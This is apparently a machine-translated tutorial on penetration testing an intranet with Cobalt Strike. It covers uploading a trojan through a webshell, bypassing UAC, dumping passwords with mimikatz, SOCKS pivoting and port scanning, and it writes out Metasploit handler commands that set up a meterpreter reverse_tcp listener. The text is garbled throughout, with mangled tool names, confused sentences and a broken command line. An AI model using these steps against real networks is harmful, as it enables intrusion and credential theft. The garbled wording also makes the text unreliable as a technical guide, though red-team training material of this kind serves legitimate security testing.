Penetration Testing on Intranet Netkwork with Cobalt strike

Introduction

Cobalt Strike is software for Adversary Simulations and Red Team Operations. Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network. While penetration tests focus on unpatched vulnerabilities and misconfigurations, these assessments benefit security operations and incident response.

Environment

  • Target: web server is an internal network host
  • Attacker: linux vps

Penetration Testing

Start cobal strike

./teamserver vps_ip password

To establish a connection, even after we still the same first to establish listener, and then generate an exe Trojans, which in the previous article has been introduced, not too much to say, and then we upload the exe to webshell and implementation, Found in the client has been on the line.

But our authority is not very high, just a webserver permissions, commonly used to mention the script has been tried, but not how to do?
In fact, through the stri strike strike may be achieved, the use of Bypass UAC
Click on the target, right -> access -> bypass uac, and then wait, the following will be prompted whether the success of success, and after the success of the list will be generated in the above a user with * number of host, as shown below

Now we can catch the password, in the cobal strike also integrated mimikatz, in the access -> Run mimikatz, and then you can see the password down.

If you do not want to find their own account password, you can view in the credentials, it is convenient.
In the network penetration, in a shell machine on the deployment of a socks, you can use the local tools to penetrate the network, so the blend strike is also integrated function, pivoting -> socks server established successfully, will be shown below:

Then we can proxy through the proxychains within the network penetration.
Of course, as a powerful collaborative work platform + penetration weapon, how could there be some common scanning function.
The cobalt strike integrates the port scan, the location is in explore -> port scan.
The default scan is / 24, you can choose a variety of scanning methods.

We can also explore -> net view for internal network survival host detection.
If you think these features are too few, the coaching strike can also be used with msf, first we need to use msf to establish a monitor, the command is as follows:

msf> use exploit/multi/handler 

msf exploit (handler)> set payload windows/meterpreter/reverse_tcp
Payload => windows /meterpreter/reverse_tcp
msf exploit (handler)> set lhost 192.168.146.178
lhost => 192.168.146.178
msf exploit (handler)>
Set lport 2222 lport => 2222
msf exploit (handler)> exploit-j

Then we create a new monitor in the cobalt strike, select windows/foreign/reverse_tcp,

and then select the following :

Select just select the listener, and then we return to msf, we have seen the session has been.

Sometimes, we need to enter the network machine, such as some software needs to open in the desktop environment, or some administrators will put some things on the desktop, coaching strike also thought of this problem, so we can also enter through this Desktop environment.